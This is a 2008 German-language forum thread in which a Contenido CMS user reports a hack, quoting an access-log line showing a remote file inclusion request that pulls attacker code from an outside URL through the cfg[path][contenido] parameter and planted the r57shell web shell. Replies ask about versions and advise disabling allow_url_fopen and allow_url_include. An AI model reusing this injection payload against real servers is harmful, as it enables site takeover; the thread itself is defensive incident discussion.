CONTENIDO Forum

Das Diskussionsforum zum Open Source Content Management System
https://www.forum.contenido.org/

Server über Contenido gehackt - unsicherer Code?

https://www.forum.contenido.org/viewtopic.php?f=108&t=21728

Seite 1 von 1

Server über Contenido gehackt - unsicherer Code?

Verfasst: Do 5. Jun 2008, 08:04
von walter999
Mein Provider teilte mir gestern mit das mein Account gehackt worden ist.

Folgender Eintrag befindet sich in der Access-Log:

Code: Alles auswählen

- - [03/Jun/2008:23:32:27 +0200] "POST 
/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.churchlawgroup.com/amember/main.txt.t
xt? HTTP/1.0" 200 33327 
http://www.MEINE_ANGEGRIFFENE_DOMAIN.com/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.churchlawgro
up.com/amember/main.txt.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Daraufhin habe ich natürlich gesucht und eine eingeschleuste Datei gefunden.
Die Datei ist eine bekannte Hackdatei: r57shell.php
Sie wurde unter dem Namen include.html.php im include-Verzeichnis gespeichert. Ich habe diese natürlich sofort gelöscht.

Mein Anbieter teilte mir folgendes mit:

Das ist die unsichere Variable in diesem aufgerufenen Script welche dann für einen so genannten CodeInjection missbraucht wurde:

cfg[path][contenido]=

Und dieser unsicheren Variable wurde diese URL angehängt:

http://www.churchlawgroup.com/amember/main.txt.txt?

Diese externe Textdatei enhält reinen Quellcode über den Angreifer zB. eine Art Dateiexplorer ausführen um fremde Dateien auf Ihren Account zu schieben.

Kann dies einer der Contenido-Entwickler bestätigen?

Ich bitte Euch schnellstmöglich einen Patch dafür bereitzustellen.


Vielen Dank und viele Grüße
Walter

Verfasst: Do 5. Jun 2008, 09:17
von emergence
welche contenido version ?
welche php version ?

Verfasst: Do 5. Jun 2008, 09:45
von Dodger77
emergence hat geschrieben:welche contenido version ?
Ich vermute mal 4.6.4 oder früher.

Verfasst: Do 5. Jun 2008, 10:17
von walter999
Sorry hab ich total vergessen zu nennen:

Contenido-Version: 4.6.4 (ist schon ein älteres Projekt)
PHP-Version: 4.4.8

Gibts dazu Sicherheitspatches oder müßte man komplett updaten (was ich eigentlich vermeiden möchte da ziemlich viel individuell umprogrammiert wurde und manche Module da sicher Probleme machen weren.

Viele Grüße und danke
Walter

Verfasst: Do 5. Jun 2008, 11:19
von MichFress
Kennst du das hier schon? http://forum.contenido.org/viewtopic.php?t=18795

Verfasst: Do 5. Jun 2008, 11:24
von walter999
Danke kannte ich noch nicht obwohl ich vorher die Suche bemühte. Vielleicht hab ich zu spezifisch für mein Problem gesucht.

Danke!!!

Grüße
Walter

Verfasst: Do 5. Jun 2008, 11:47
von rethus
Ich kann nur empfehlen, lasst euch unbeding allow_url_follow für euren Webspace deaktivieren. Das erspart Euch eine menge Ärger, in Sachen php-injection.

Verfasst: Do 19. Jun 2008, 14:00
von quacon
allow_url_follow? Du meinst sicherlich allow_url_fopen und für PHP 5 allow_url_include. allow_url_follow ist mir nicht bekannt. In der Tat sollte man beide auf "off" setzen. Viele Grüße, quacon
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de